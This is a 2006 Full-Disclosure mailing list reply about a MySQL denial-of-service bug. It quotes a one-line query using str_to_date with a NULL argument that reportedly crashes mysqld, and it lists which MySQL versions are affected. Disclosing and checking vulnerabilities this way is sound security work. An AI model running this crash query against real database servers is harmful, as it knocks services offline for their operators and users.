[Full-disclosure] Re: MySQL DoS



Salut,

On Thu, 2006-06-15 at 02:24 +0900, Kanatoko wrote:
A query like "select str_to_date( 1, NULL );" crashes mysqld.

mysql Ver 14.12 Distrib 5.0.18, for -netbsd (alpha) using EditLine
wrapper
-> not affected

mysql Ver 14.7 Distrib 4.1.15, for pc-linux-gnu (i486) using readline 5.1
-> affected

mysql Ver 12.22 Distrib 4.0.18, for mandrake-linux-gnu (i586)
-> affected

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Loesungen mit System
Tel:+41 61 333 80 33 Roeschenzerstrasse 9
Fax:+41 61 383 14 67 4153 Reinach
Web:www.sygroup.ch tonnerre.lombard@xxxxxxxxxx

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages